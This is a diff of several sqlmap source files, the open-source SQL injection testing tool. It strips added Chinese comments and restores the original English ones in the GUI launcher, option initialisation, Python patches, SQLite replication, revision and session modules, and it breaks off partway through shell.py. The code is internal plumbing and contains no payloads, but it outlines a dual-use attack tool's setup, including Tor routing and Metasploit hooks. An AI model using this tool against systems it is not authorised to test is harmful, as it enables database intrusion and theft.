-        # 当回车键按下时，获取全局变量line和queue
        global line
        global queue

-        # 如果process存在
        if process:
            try:
-                # 将line写入process的stdin，并刷新
                process.stdin.write(("%s\n" % line.strip()).encode())
                process.stdin.flush()
            except socket.error:
-                # 如果发生socket错误，将line置为空，关闭窗口，并返回"break"
                line = ""
                event.widget.master.master.destroy()
                return "break"
            except:
-                # 如果发生其他错误，返回
                return

-            # 在text中插入一个换行符
            event.widget.insert(_tkinter.END, "\n")

-            # 返回"break"
            return "break"

    def run():
-        # 获取全局变量alive、process和queue
        global alive
        global process
        global queue

-        # 创建一个空字典config
        config = {}

-        # 遍历window._widgets中的键值对
        for key in window._widgets:
-            # 获取键值对中的dest和type
            dest, type = key
-            # 获取键值对中的widget
            widget = window._widgets[key]

-            # 如果widget有get方法且返回值为空，则将value置为None
            if hasattr(widget, "get") and not widget.get():
                value = None
-            # 如果type为"string"，则将value置为widget.get()
            elif type == "string":
                value = widget.get()
-            # 如果type为"float"，则将value置为float(widget.get())
            elif type == "float":
                value = float(widget.get())
-            # 如果type为"int"，则将value置为int(widget.get())
            elif type == "int":
                value = int(widget.get())
-            # 否则将value置为bool(widget.var.get())
            else:
                value = bool(widget.var.get())

-            # 将value添加到config中
            config[dest] = value

-        # 遍历parser.option_list中的option
        for option in parser.option_list:
-            # 将option.dest添加到config中，如果defaults中有option.dest，则将defaults[option.dest]添加到config中，否则将None添加到config中
            config[option.dest] = defaults.get(option.dest, None)

-        # 创建一个临时文件，并将config保存到该文件中
        handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True)
        os.close(handle)

        saveConfig(config, configFile)

-        # 定义一个函数enqueue，用于将stream中的内容放入queue中
        def enqueue(stream, queue):
-            # 获取全局变量alive
            global alive

-            # 遍历stream中的每一行
            for line in iter(stream.readline, b''):
-                # 将line放入queue中
                queue.put(line)

            alive = False
@ -213,7 +173,6 @@ def runGui(parser):

        alive = True

-        # 使用subprocess.Popen启动sqlmap.py
        process = subprocess.Popen([sys.executable or "python", os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap.py"), "-c", configFile], shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, bufsize=1, close_fds=not IS_WIN)

        # Reference: https://stackoverflow.com/a/4896288
@ -247,10 +206,8 @@ def runGui(parser):
                if not alive:
                    break

-    # 创建菜单栏
    menubar = _tkinter.Menu(window)

-    # 创建文件菜单
    filemenu = _tkinter.Menu(menubar, tearoff=0)
    filemenu.add_command(label="Open", state=_tkinter.DISABLED)
    filemenu.add_command(label="Save", state=_tkinter.DISABLED)
@ -258,10 +215,8 @@ def runGui(parser):
    filemenu.add_command(label="Exit", command=window.quit)
    menubar.add_cascade(label="File", menu=filemenu)

-    # 添加运行按钮
    menubar.add_command(label="Run", command=run)

-    # 创建帮助菜单
    helpmenu = _tkinter.Menu(menubar, tearoff=0)
    helpmenu.add_command(label="Official site", command=lambda: webbrowser.open(SITE))
    helpmenu.add_command(label="Github pages", command=lambda: webbrowser.open(GIT_PAGE))
@ -271,17 +226,14 @@ def runGui(parser):
    helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2024\n\n    (%s)" % DEV_EMAIL_ADDRESS))
    menubar.add_cascade(label="Help", menu=helpmenu)

-    # 将菜单栏添加到窗口
    window.config(menu=menubar)
    window._widgets = {}

-    # 创建可调整大小的Notebook
    notebook = AutoresizableNotebook(window)

    first = None
    frames = {}

-    # 遍历所有选项组
    for group in parser.option_groups:
        frame = frames[group.title] = _tkinter.Frame(notebook, width=200, height=200)
        notebook.add(frames[group.title], text=group.title)
@ -294,11 +246,9 @@ def runGui(parser):
            _tkinter.Label(frame).grid(column=0, row=2, sticky=_tkinter.W)
            row += 2

-        # 遍历每个选项
        for option in group.option_list:
            _tkinter.Label(frame, text="%s " % parser.formatter._format_option_strings(option)).grid(column=0, row=row, sticky=_tkinter.W)

-            # 根据选项类型创建相应的控件
            if option.type == "string":
                widget = _tkinter.Entry(frame)
            elif option.type == "float":
@ -315,7 +265,6 @@ def runGui(parser):

            window._widgets[(option.dest, option.type)] = widget

-            # 设置默认值
            default = defaults.get(option.dest)
            if default:
                if hasattr(widget, "insert"):
@ -327,12 +276,9 @@ def runGui(parser):

        _tkinter.Label(frame).grid(column=0, row=row, sticky=_tkinter.W)

-    # 将Notebook添加到窗口
    notebook.pack(expand=1, fill="both")
    notebook.enable_traversal()

-    # 设置焦点
    first.focus()

-    # 进入主循环
    window.mainloop()
--- a/src/sqlmap-master/lib/core/option.py
+++ b/src/sqlmap-master/lib/core/option.py
@ -2471,18 +2471,14 @@ def _setTorProxySettings():
        _setTorSocksProxySettings()

 def _setTorHttpProxySettings():
-    # 设置Tor HTTP代理设置
    infoMsg = "setting Tor HTTP proxy settings"
    logger.info(infoMsg)

-    # 查找本地端口
    port = findLocalPort(DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,))

-    # 如果找到端口，则设置代理
    if port:
        conf.proxy = "http://%s:%d" % (LOCALHOST, port)
    else:
-        # 如果找不到端口，则抛出异常
        errMsg = "can't establish connection with the Tor HTTP proxy. "
        errMsg += "Please make sure that you have Tor (bundle) installed and setup "
        errMsg += "so you could be able to successfully use switch '--tor' "
@ -2536,26 +2532,21 @@ def _checkWebSocket():
            raise SqlmapMissingDependence(errMsg)

 def _checkTor():
-    # 检查是否启用了Tor
    if not conf.checkTor:
        return

-    # 记录日志信息
    infoMsg = "checking Tor connection"
    logger.info(infoMsg)

-    # 尝试获取页面
    try:
        page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
    except SqlmapConnectionException:
        page = None

-    # 如果页面不存在或者页面中不包含"Congratulations"，则抛出异常
    if not page or "Congratulations" not in page:
        errMsg = "it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
        raise SqlmapConnectionException(errMsg)
    else:
-        # 记录日志信息
        infoMsg = "Tor is properly being used"
        logger.info(infoMsg)

@ -2896,118 +2887,62 @@ def init():
    based upon command line and configuration file options.
    """

-    # 使用向导界面
    _useWizardInterface()
-    # 设置日志级别
    setVerbosity()
-    # 保存配置
    _saveConfig()
-    # 从文件中设置请求
    _setRequestFromFile()
-    # 清理选项
    _cleanupOptions()
-    # 清理环境
    _cleanupEnvironment()
-    # 清除
    _purge()
-    # 检查依赖
    _checkDependencies()
-    # 创建主目录
    _createHomeDirectories()
-    # 创建临时目录
    _createTemporaryDirectory()
-    # 基本选项验证
    _basicOptionValidation()
-    # 设置代理列表
    _setProxyList()
-    # 设置Tor代理设置
    _setTorProxySettings()
-    # 设置DNS服务器
    _setDNSServer()
-    # 调整日志格式
    _adjustLoggingFormatter()
-    # 设置多个目标
    _setMultipleTargets()
-    # 列出篡改函数
    _listTamperingFunctions()
-    # 设置篡改函数
    _setTamperingFunctions()
-    # 设置预处理函数
    _setPreprocessFunctions()
-    # 设置后处理函数
    _setPostprocessFunctions()
-    # 设置流量输出文件
    _setTrafficOutputFP()
-    # 设置HTTP收集器
    _setupHTTPCollector()
-    # 设置HTTP分块
    _setHttpChunked()
-    # 检查WebSocket
    _checkWebSocket()

-    # 解析目标直接
    parseTargetDirect()

-    # 如果有url、logFile、bulkFile、requestFile、googleDork、stdinPipe中的任何一个，则执行以下操作
    if any((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.stdinPipe)):
-        # 设置主机名
        _setHostname()
-        # 设置HTTP超时
        _setHTTPTimeout()
-        # 设置HTTP额外头部
        _setHTTPExtraHeaders()
-        # 设置HTTP Cookies
        _setHTTPCookies()
-        # 设置HTTP Referer
        _setHTTPReferer()
-        # 设置HTTP Host
        _setHTTPHost()
-        # 设置HTTP User Agent
        _setHTTPUserAgent()
-        # 设置HTTP 认证
        _setHTTPAuthentication()
-        # 设置HTTP 处理器
        _setHTTPHandlers()
-        # 设置DNS缓存
        _setDNSCache()
-        # 设置Socket 预连接
        _setSocketPreConnect()
-        # 设置安全访问
        _setSafeVisit()
-        # 执行搜索
        _doSearch()
-        # 设置标准输入管道目标
        _setStdinPipeTargets()
-        # 设置批量多个目标
        _setBulkMultipleTargets()
-        # 检查Tor
        _checkTor()
-        # 设置爬虫
        _setCrawler()
-        # 查找页面表单
        _findPageForms()
-        # 设置DBMS
        _setDBMS()
-        # 设置技术
        _setTechnique()

-    # 设置线程
    _setThreads()
-    # 设置操作系统
    _setOS()
-    # 设置写入文件
    _setWriteFile()
-    # 设置Metasploit
    _setMetasploit()
-    # 设置DBMS 认证
    _setDBMSAuthentication()
-    # 加载边界
    loadBoundaries()
-    # 加载负载
    loadPayloads()
-    # 设置前缀后缀
    _setPrefixSuffix()
-    # 更新
    update()
-    # 加载查询
    _loadQueries()
--- a/src/sqlmap-master/lib/core/patch.py
+++ b/src/sqlmap-master/lib/core/patch.py
@ -48,15 +48,15 @@ from thirdparty.six.moves import http_client as _http_client

 _rand = 0

-
 def dirtyPatches():
    """
-    用于进行 Python 相关的“补丁”操作
+    Place for "dirty" Python related patches
    """
-    # 接受过长的结果行（例如 HTTP 头部响应中的 SQLi 结果）
+
+    # accept overly long result lines (e.g. SQLi results in HTTP header responses)
    _http_client._MAXLINE = 1 * 1024 * 1024

-    # 防止在 sqlmap 分块的情况下出现双重分块编码（注意：如果 Python 3 缺少 'Content-length' 会自动分块）
+    # prevent double chunked encoding in case of sqlmap chunking (Note: Python3 does it automatically if 'Content-length' is missing)
    if six.PY3:
        if not hasattr(_http_client.HTTPConnection, "__send_output"):
            _http_client.HTTPConnection.__send_output = _http_client.HTTPConnection._send_output
@ -68,14 +68,14 @@ def dirtyPatches():

        _http_client.HTTPConnection._send_output = _send_output

-    # 在 Windows 操作系统上添加对 inet_pton() 的支持
+    # add support for inet_pton() on Windows OS
    if IS_WIN:
        from thirdparty.wininetpton import win_inet_pton

-    # 参考：https://github.com/nodejs/node/issues/12786#issuecomment-298652440
+    # Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440
    codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None)

-    # 参考：http://bugs.python.org/issue17849
+    # Reference: http://bugs.python.org/issue17849
    if hasattr(_http_client, "LineAndFileWrapper"):
        def _(self, *args):
            return self._readline()
@ -83,36 +83,32 @@ def dirtyPatches():
        _http_client.LineAndFileWrapper._readline = _http_client.LineAndFileWrapper.readline
        _http_client.LineAndFileWrapper.readline = _

-    # 防止在检索二进制数据时过多的“猜测”
+    # to prevent too much "guessing" in case of binary data retrieval
    thirdparty.chardet.universaldetector.MINIMUM_THRESHOLD = 0.90

-    # 在命令行参数中查找 --method 并检查方法是否不是 POST
    match = re.search(r" --method[= ](\w+)", " ".join(sys.argv))
-    if match and match.group(1).upper()!= PLACE.POST:
+    if match and match.group(1).upper() != PLACE.POST:
        PLACE.CUSTOM_POST = PLACE.CUSTOM_POST.replace("POST", "%s (body)" % match.group(1))

-    # 参考：https://github.com/sqlmapproject/sqlmap/issues/4314
+    # Reference: https://github.com/sqlmapproject/sqlmap/issues/4314
    try:
        os.urandom(1)
    except NotImplementedError:
        if six.PY3:
-            # 如果 Python 3 不支持 os.urandom，使用随机数生成字节串
            os.urandom = lambda size: bytes(random.randint(0, 255) for _ in range(size))
        else:
-            # 如果 Python 2 不支持 os.urandom，使用随机数生成字符串
            os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size))

-    # 参考：https://github.com/sqlmapproject/sqlmap/issues/5727
-    # 参考：https://stackoverflow.com/a/14076841
+    # Reference: https://github.com/sqlmapproject/sqlmap/issues/5727
+    # Reference: https://stackoverflow.com/a/14076841
    try:
        import pymysql
-        # 将 pymysql 安装为 MySQLdb
        pymysql.install_as_MySQLdb()
    except (ImportError, AttributeError):
        pass

-    # 参考：https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py
-    # 参考：https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec
+    # Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py
+    # Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec
    if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"):
        ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults"))

@ -131,7 +127,7 @@ def dirtyPatches():

        inspect.getargspec = getargspec

-    # 安装“可逆”的 unicode（解码）错误处理程序
+    # Installing "reversible" unicode (decoding) error handler
    def _reversible(ex):
        if INVALID_UNICODE_PRIVATE_AREA:
            return (u"".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end)
@ -140,7 +136,7 @@ def dirtyPatches():

    codecs.register_error("reversible", _reversible)

-    # 参考：https://github.com/sqlmapproject/sqlmap/issues/5731
+    # Reference: https://github.com/sqlmapproject/sqlmap/issues/5731
    if not hasattr(logging, "_acquireLock"):
        def _acquireLock():
            if logging._lock:
@ -155,11 +151,11 @@ def dirtyPatches():

        logging._releaseLock = _releaseLock

-
 def resolveCrossReferences():
    """
-    用于解决交叉引用
+    Place for cross-reference resolution
    """
+
    lib.core.threads.isDigit = isDigit
    lib.core.threads.readInput = readInput
    lib.core.common.getPageTemplate = getPageTemplate
@ -174,22 +170,22 @@ def resolveCrossReferences():
    lib.utils.sqlalchemy.getSafeExString = getSafeExString
    thirdparty.ansistrm.ansistrm.stdoutEncode = stdoutEncode

-
 def pympTempLeakPatch(tempDir):
    """
-    用于修补 Python 3 中“pymp”的目录泄漏问题
+    Patch for "pymp" leaking directories inside Python3
    """
+
    try:
        import multiprocessing.util
        multiprocessing.util.get_temp_dir = lambda: tempDir
    except:
        pass

-
 def unisonRandom():
    """
-    统一不同 Python 版本的随机数据生成
+    Unifying random generated data across different Python versions
    """
+
    def _lcg():
        global _rand
        a = 1140671485
@ -215,4 +211,4 @@ def unisonRandom():
    random.choice = _choice
    random.randint = _randint
    random.sample = _sample
-    random.seed = _seed
+    random.seed = _seed
--- a/src/sqlmap-master/lib/core/readlineng.py
+++ b/src/sqlmap-master/lib/core/readlineng.py
@ -5,68 +5,58 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 初始化readline模块变量为None
 _readline = None
 try:
-    # 尝试导入系统自带的readline模块
    from readline import *
    import readline as _readline
 except:
    try:
-        # 如果系统readline导入失败,尝试导入pyreadline模块(Windows平台的readline实现)
        from pyreadline import *
        import pyreadline as _readline
    except:
        pass

-# 导入所需的日志记录器和系统平台相关的设置
 from lib.core.data import logger
 from lib.core.settings import IS_WIN
 from lib.core.settings import PLATFORM

-# 在Windows平台下检查readline的输出文件
 if IS_WIN and _readline:
    try:
        _outputfile = _readline.GetOutputFile()
    except AttributeError:
-        # 如果获取输出文件失败,记录调试信息
        debugMsg = "Failed GetOutputFile when using platform's "
        debugMsg += "readline library"
        logger.debug(debugMsg)

        _readline = None

-# 检测是否使用libedit替代GNU readline
-# 感谢Boyd Waters提供这个补丁
+# Test to see if libedit is being used instead of GNU readline.
+# Thanks to Boyd Waters for this patch.
 uses_libedit = False

-# 在Mac平台下检测是否使用libedit
 if PLATFORM == "mac" and _readline:
    import commands

-    # 使用otool命令检查readline库的依赖,查找是否包含libedit
    (status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__)

    if status == 0 and len(result) > 0:
-        # 如果使用libedit(Leopard系统新特性),设置Tab键自动完成
+        # We are bound to libedit - new in Leopard
        _readline.parse_and_bind("bind ^I rl_complete")

-        # 记录检测到libedit的调试信息
        debugMsg = "Leopard libedit detected when using platform's "
        debugMsg += "readline library"
        logger.debug(debugMsg)

        uses_libedit = True

-# clear_history()函数在Python 2.4中才引入
-# 它在readline API中是可选的,所以需要显式检查其是否存在
-# 某些平台可能没有这个函数
-# 相关讨论见:http://mail.python.org/pipermail/python-dev/2003-August/037845.html
+# the clear_history() function was only introduced in Python 2.4 and is
+# actually optional in the readline API, so we must explicitly check for its
+# existence.  Some known platforms actually don't have it.  This thread:
+# http://mail.python.org/pipermail/python-dev/2003-August/037845.html
+# has the original discussion.
 if _readline:
    if not hasattr(_readline, "clear_history"):
-        # 如果没有clear_history函数,创建一个空实现
        def clear_history():
            pass

-        # 将空实现添加到readline模块
        _readline.clear_history = clear_history
--- a/src/sqlmap-master/lib/core/replication.py
+++ b/src/sqlmap-master/lib/core/replication.py
@ -5,36 +5,29 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入sqlite3数据库模块
 import sqlite3

-# 导入一些辅助函数
-from lib.core.common import cleanReplaceUnicode  # 用于清理和替换Unicode字符
-from lib.core.common import getSafeExString      # 用于安全地获取异常信息字符串
-from lib.core.common import unsafeSQLIdentificatorNaming  # 用于SQL标识符命名
-from lib.core.exception import SqlmapConnectionException  # 数据库连接异常
-from lib.core.exception import SqlmapGenericException    # 通用异常
-from lib.core.exception import SqlmapValueException      # 值错误异常
-from lib.core.settings import UNICODE_ENCODING          # Unicode编码设置
-from lib.utils.safe2bin import safechardecode          # 字符安全解码
+from lib.core.common import cleanReplaceUnicode
+from lib.core.common import getSafeExString
+from lib.core.common import unsafeSQLIdentificatorNaming
+from lib.core.exception import SqlmapConnectionException
+from lib.core.exception import SqlmapGenericException
+from lib.core.exception import SqlmapValueException
+from lib.core.settings import UNICODE_ENCODING
+from lib.utils.safe2bin import safechardecode

 class Replication(object):
    """
-    这个类包含了所有用于数据库复制功能的方法和类。
-    主要用于管理SQLite数据库的复制操作。
+    This class holds all methods/classes used for database
+    replication purposes.
    """

    def __init__(self, dbpath):
-        """
-        初始化复制功能
-        参数:
-            dbpath: 数据库文件路径
-        """
        try:
-            self.dbpath = dbpath  # 保存数据库路径
-            self.connection = sqlite3.connect(dbpath)  # 建立数据库连接
-            self.connection.isolation_level = None     # 设置隔离级别为None,允许手动控制事务
-            self.cursor = self.connection.cursor()     # 创建数据库游标
+            self.dbpath = dbpath
+            self.connection = sqlite3.connect(dbpath)
+            self.connection.isolation_level = None
+            self.cursor = self.connection.cursor()
        except sqlite3.OperationalError as ex:
            errMsg = "error occurred while opening a replication "
            errMsg += "file '%s' ('%s')" % (dbpath, getSafeExString(ex))
@ -42,54 +35,34 @@ class Replication(object):

    class DataType(object):
        """
-        这个内部类用于定义SQLite数据类型的辅助对象。
-        用于表示数据库中的各种数据类型。
+        Using this class we define auxiliary objects
+        used for representing sqlite data types.
        """

        def __init__(self, name):
-            """
-            初始化数据类型
-            参数:
-                name: 数据类型名称
-            """
            self.name = name

        def __str__(self):
-            """返回数据类型的字符串表示"""
            return self.name

        def __repr__(self):
-            """返回数据类型的详细字符串表示"""
            return "<DataType: %s>" % self

    class Table(object):
        """
-        这个内部类定义了用于操作数据库表的方法。
-        包含创建表、插入数据、执行SQL等功能。
+        This class defines methods used to manipulate table objects.
        """

        def __init__(self, parent, name, columns=None, create=True, typeless=False):
-            """
-            初始化表对象
-            参数:
-                parent: 父对象(Replication实例)
-                name: 表名
-                columns: 列定义
-                create: 是否创建新表
-                typeless: 是否不指定列类型
-            """
            self.parent = parent
-            self.name = unsafeSQLIdentificatorNaming(name)  # 处理表名
+            self.name = unsafeSQLIdentificatorNaming(name)
            self.columns = columns
            if create:
                try:
-                    # 如果表存在则删除
                    self.execute('DROP TABLE IF EXISTS "%s"' % self.name)
                    if not typeless:
-                        # 创建带数据类型的表
                        self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
                    else:
-                        # 创建不带数据类型的表
                        self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
                except Exception as ex:
                    errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
@ -98,9 +71,7 @@ class Replication(object):

        def insert(self, values):
            """
-            向当前表中插入数据行
-            参数:
-                values: 要插入的值列表
+            This function is used for inserting row(s) into current table.
            """

            if len(values) == len(self.columns):
@ -110,12 +81,6 @@ class Replication(object):
                raise SqlmapValueException(errMsg)

        def execute(self, sql, parameters=None):
-            """
-            执行SQL语句
-            参数:
-                sql: SQL语句
-                parameters: SQL参数
-            """
            try:
                try:
                    self.parent.cursor.execute(sql, parameters or [])
@ -129,20 +94,17 @@ class Replication(object):

        def beginTransaction(self):
            """
-            开始事务
-            使用显式事务可以大大提高多次插入操作的性能
+            Great speed improvement can be gained by using explicit transactions around multiple inserts.
+            Reference: http://stackoverflow.com/questions/4719836/python-and-sqlite3-adding-thousands-of-rows
            """
            self.execute('BEGIN TRANSACTION')

        def endTransaction(self):
-            """结束事务"""
            self.execute('END TRANSACTION')

        def select(self, condition=None):
            """
-            从当前表中选择数据
-            参数:
-                condition: WHERE条件子句
+            This function is used for selecting row(s) from current table.
            """
            _ = 'SELECT * FROM %s' % self.name
            if condition:
@ -151,25 +113,17 @@ class Replication(object):

    def createTable(self, tblname, columns=None, typeless=False):
        """
-        创建表对象
-        参数:
-            tblname: 表名
-            columns: 列定义
-            typeless: 是否不指定列类型
+        This function creates Table instance with current connection settings.
        """
        return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless)

    def __del__(self):
-        """
-        析构函数
-        关闭数据库连接和游标
-        """
        self.cursor.close()
        self.connection.close()

-    # SQLite数据类型定义
-    NULL = DataType('NULL')      # 空值类型
-    INTEGER = DataType('INTEGER')  # 整数类型
-    REAL = DataType('REAL')      # 浮点数类型
-    TEXT = DataType('TEXT')      # 文本类型
-    BLOB = DataType('BLOB')      # 二进制数据类型
+    # sqlite data types
+    NULL = DataType('NULL')
+    INTEGER = DataType('INTEGER')
+    REAL = DataType('REAL')
+    TEXT = DataType('TEXT')
+    BLOB = DataType('BLOB')
--- a/src/sqlmap-master/lib/core/revision.py
+++ b/src/sqlmap-master/lib/core/revision.py
@ -14,64 +14,53 @@ from lib.core.convert import getText

 def getRevisionNumber():
    """
-    获取Git仓库的简短提交哈希值(通过"git rev-parse --short HEAD"命令)
-    
-    返回值是7位长的哈希字符串或None
+    Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD"
+
    >>> len(getRevisionNumber() or (' ' * 7)) == 7
    True
    """

-    # 初始化返回值和文件路径
-    retVal = None  # 最终返回的哈希值
-    filePath = None  # Git HEAD文件的路径
-    _ = os.path.dirname(__file__)  # 获取当前文件所在目录
+    retVal = None
+    filePath = None
+    _ = os.path.dirname(__file__)

-    # 向上遍历目录树,寻找.git目录
    while True:
-        filePath = os.path.join(_, ".git", "HEAD")  # 拼接.git/HEAD的完整路径
-        if os.path.exists(filePath):  # 如果找到了.git目录就退出循环
+        filePath = os.path.join(_, ".git", "HEAD")
+        if os.path.exists(filePath):
            break
        else:
            filePath = None
-            if _ == os.path.dirname(_):  # 已经到达根目录,退出循环
+            if _ == os.path.dirname(_):
                break
            else:
-                _ = os.path.dirname(_)  # 继续向上一级目录查找
+                _ = os.path.dirname(_)

-    # 读取并解析HEAD文件内容
    while True:
-        if filePath and os.path.isfile(filePath):  # 确认HEAD文件存在且是文件
+        if filePath and os.path.isfile(filePath):
            with openFile(filePath, "r") as f:
-                content = getText(f.read())  # 读取HEAD文件内容
+                content = getText(f.read())
                filePath = None

-                # HEAD文件可能包含引用(ref)或直接的哈希值
-                if content.startswith("ref: "):  # 如果是引用格式
+                if content.startswith("ref: "):
                    try:
-                        # 获取引用指向的实际文件路径
                        filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip()
                    except UnicodeError:
                        pass

-                if filePath is None:  # 如果是直接的哈希值格式
-                    # 使用正则表达式匹配32位的十六进制哈希值
+                if filePath is None:
                    match = re.match(r"(?i)[0-9a-f]{32}", content)
                    retVal = match.group(0) if match else None
                    break
        else:
            break

-    # 如果通过读取文件方式未获取到哈希值,尝试使用git命令获取
    if not retVal:
        try:
-            # 执行git命令获取当前HEAD的完整哈希值
            process = subprocess.Popen("git rev-parse --verify HEAD", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            stdout, _ = process.communicate()
-            # 从命令输出中提取哈希值
            match = re.search(r"(?i)[0-9a-f]{32}", getText(stdout or ""))
            retVal = match.group(0) if match else None
        except:
            pass

-    # 返回前7位的简短哈希值,如果没有获取到则返回None
    return retVal[:7] if retVal else None
--- a/src/sqlmap-master/lib/core/session.py
+++ b/src/sqlmap-master/lib/core/session.py
@ -5,97 +5,75 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的模块
 import re

-from lib.core.common import Backend  # 导入后端处理模块
-from lib.core.common import Format   # 导入格式化处理模块
-from lib.core.common import hashDBWrite  # 导入哈希数据库写入函数
-from lib.core.data import kb  # 导入知识库模块
-from lib.core.data import logger  # 导入日志记录模块
-from lib.core.enums import HASHDB_KEYS  # 导入哈希数据库键值枚举
-from lib.core.enums import OS  # 导入操作系统枚举
-from lib.core.settings import SUPPORTED_DBMS  # 导入支持的数据库管理系统列表
+from lib.core.common import Backend
+from lib.core.common import Format
+from lib.core.common import hashDBWrite
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.enums import HASHDB_KEYS
+from lib.core.enums import OS
+from lib.core.settings import SUPPORTED_DBMS

 def setDbms(dbms):
    """
-    设置数据库管理系统的指纹信息到知识库中
-    @param dbms: 要设置的数据库管理系统名称
-    @type dbms: C{str} 字符串类型
+    @param dbms: database management system to be set into the knowledge
+    base as fingerprint.
+    @type dbms: C{str}
    """

-    # 将数据库类型写入哈希数据库,用于后续查询和缓存
    hashDBWrite(HASHDB_KEYS.DBMS, dbms)

-    # 构造一个正则表达式模式,用所有支持的数据库类型组成
-    # 例如: (MySQL|Oracle|PostgreSQL|Microsoft SQL Server)
    _ = "(%s)" % ('|'.join(SUPPORTED_DBMS))
-    # 使用正则表达式匹配输入的数据库类型,不区分大小写
-    # \A表示字符串开头,( |\Z)表示后面跟空格或字符串结尾
    _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I)

    if _:
-        # 如果匹配成功,提取匹配的数据库类型名称
        dbms = _.group(1)

-    # 设置后端数据库类型,用于后续的数据库操作
    Backend.setDbms(dbms)
    if kb.resolutionDbms:
-        # 如果存在解析后的数据库类型(可能是更精确的版本),则更新到哈希数据库
        hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms)

-    # 记录日志,输出识别到的数据库类型,方便用户查看
    logger.info("the back-end DBMS is %s" % Backend.getDbms())

 def setOs():
    """
-    设置目标系统的操作系统信息
-    这个函数会解析banner中的操作系统指纹信息,并设置相关参数
-    kb.bannerFp字典示例:
+    Example of kb.bannerFp dictionary:
+
    {
-      'sp': set(['Service Pack 4']),     # 系统补丁包信息
-      'dbmsVersion': '8.00.194',         # 数据库版本
-      'dbmsServicePack': '0',            # 数据库补丁包版本
-      'distrib': set(['2000']),          # 系统发行版本
-      'dbmsRelease': '2000',             # 数据库发行版本
-      'type': set(['Windows'])           # 操作系统类型
+      'sp': set(['Service Pack 4']),
+      'dbmsVersion': '8.00.194',
+      'dbmsServicePack': '0',
+      'distrib': set(['2000']),
+      'dbmsRelease': '2000',
+      'type': set(['Windows'])
    }
    """

-    # 用于存储要输出的系统信息描述
    infoMsg = ""

-    # 如果没有banner指纹信息,说明无法获取系统信息,直接返回
    if not kb.bannerFp:
        return

-    # 如果banner中包含操作系统类型信息
    if "type" in kb.bannerFp:
-        # 设置操作系统类型(如Windows、Linux等)
        Backend.setOs(Format.humanize(kb.bannerFp["type"]))
        infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()

-    # 如果包含系统发行版本信息(如Windows 2000、Windows XP等)
    if "distrib" in kb.bannerFp:
        kb.osVersion = Format.humanize(kb.bannerFp["distrib"])
        infoMsg += " %s" % kb.osVersion

-    # 如果包含系统补丁包信息(Service Pack)
    if "sp" in kb.bannerFp:
-        # 提取补丁包版本号,去掉"Service Pack "前缀,只保留数字
        kb.osSP = int(Format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", ""))

-    # 如果是Windows系统但没有补丁包信息,则默认设置为SP0
    elif "sp" not in kb.bannerFp and Backend.isOs(OS.WINDOWS):
        kb.osSP = 0

-    # 如果有完整的系统信息(系统类型、版本和补丁包),则在输出中添加补丁包信息
    if Backend.getOs() and kb.osVersion and kb.osSP:
        infoMsg += " Service Pack %d" % kb.osSP

-    # 如果收集到了系统信息,则记录到日志中
    if infoMsg:
        logger.info(infoMsg)

-    # 将确定的操作系统类型写入哈希数据库,用于后续查询
    hashDBWrite(HASHDB_KEYS.OS, Backend.getOs())
--- a/src/sqlmap-master/lib/core/shell.py
+++ b/src/sqlmap-master/lib/core/shell.py
@ -5,34 +5,29 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的Python标准库
-import atexit  # 用于注册程序退出时的回调函数
-import os     # 提供与操作系统交互的功能
-
-# 导入自定义模块
-from lib.core import readlineng as readline  # 导入readline模块用于命令行输入处理
-from lib.core.common import getSafeExString  # 用于安全地获取异常的字符串表示
-from lib.core.data import logger            # 日志记录器
-from lib.core.data import paths             # 存储各种路径信息
-from lib.core.enums import AUTOCOMPLETE_TYPE # 自动完成类型的枚举
-from lib.core.enums import OS               # 操作系统类型的枚举
-from lib.core.settings import IS_WIN        # 判断是否为Windows系统
-from lib.core.settings import MAX_HISTORY_LENGTH # 历史记录最大长度
+import atexit
+import os
+
+from lib.core import readlineng as readline
